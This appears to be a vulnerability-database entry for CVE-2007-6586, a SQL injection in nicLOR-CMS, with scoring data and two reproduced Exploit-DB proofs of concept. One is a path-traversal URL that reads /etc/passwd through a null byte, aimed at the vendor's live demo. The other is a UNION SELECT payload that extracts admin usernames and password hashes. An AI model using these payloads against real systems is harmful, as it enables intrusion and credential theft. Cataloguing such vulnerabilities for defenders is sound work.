CVE-2007-6586
Published: 2007-12-28
Priority: P3 · 38 · high · 7.5 CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.00% (58.3th percentile)
SQL injection vulnerability in sezione_news.php in nicLOR-CMS allows remote attackers to execute arbitrary SQL commands via the id parameter in a sezione page action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| niclor | niclor | — | — |
No detection rules found.
Exploit-DB
nicLOR Puglia Landscape - Local File Inclusion
exploitdb·2008-11-04
---
/*
Puglia_Landscape Local File Inclusion Vulnerability
Discovered By StAkeR[at]hotmail[dot]it
http://www.niclor.net/prodotti/Puglia_Landscape
* Local File Inclusion
* Note: Magic_Quotes_GPC Off
- index.php?id=../../../../../../../[Local File and NullByte]
- index.php?id=../../../../../../../etc/passwd%00
* Demo
- http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00
*/
# milw0rm.com [2008-11-04]
Exploit-DB
nicLOR CMS - 'sezione_news.php' SQL Injection
exploitdb·2007-12-21
---
Name : nicLOR-CMS SQL Injection Vulnerability.
Author : x0kster
Email : [email protected]
Script Download : http://www.niclor.net/prodotti/16-04-06-niclor_cms.zip
Date : 21/12/2007
#SQL Injection in sezione_news.php
So we can exploit the $intSezioneID and execute an sql injection.
PoC:
http://example.com/nicLOR-CMS/index.php?page=sezione&id=-1+union+select+1,concat(strUser,0x3a,strPass)+from+login/*
And then we'll get the username and the hash of the admin.
# milw0rm.com [2007-12-21]
No writeups or analysis indexed.